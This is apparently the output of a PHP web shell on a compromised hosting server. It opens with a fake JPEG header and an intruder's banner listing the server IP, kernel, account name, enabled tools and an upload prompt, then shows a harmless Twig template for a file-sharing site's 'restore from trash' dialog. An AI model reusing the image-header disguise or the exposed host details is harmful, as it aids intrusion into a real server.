����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.219.151.249 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/themes/evolution/views/account/ajax/ |
Upload File : |
<form action="{{ theme.getAccountWebRoot() }}/ajax/restore_from_trash_process" autocomplete="off"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h4 class="modal-title">{{ t("restore_items", "Restore Items") }} ({{ totalItems }} {{ t("items", "items") }})</h4> </div> <div class="modal-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="folder" class="control-label">{{ t("restore_to_folder", "restore to folder")|title }}</label> <select class="form-control" name="restoreFolderId" id="restoreFolderId"> <option value="">/</option> {% for k,folderListingItem in folderListing %} <option value="{{ k }}"> {{ folderListingItem }} </option> {% endfor %} </select> </div> <p>{{ t("restore_note_file_contents_included", "Note that restoring a folder will also restore any files within it.") }}</p> </div> </div> </div> <div class="modal-footer"> <input type="hidden" name="submitme" id="submitme" value="1"/> <input type="hidden" value="{{ safeFileIds|join(',') }}" name="fileIds"/> <input type="hidden" value="{{ safeFolderIds|join(',') }}" name="folderIds"/> <button type="button" class="btn btn-default" data-dismiss="modal">{{ t("cancel", "cancel") }}</button> <button type="button" class="btn btn-info" onClick="processAjaxForm(this, function () { refreshFileListing(); $('.modal').modal('hide'); }); return false;">{{ t("restore", "restore")|title }} <i class="entypo-check"></i></button> </div> </form>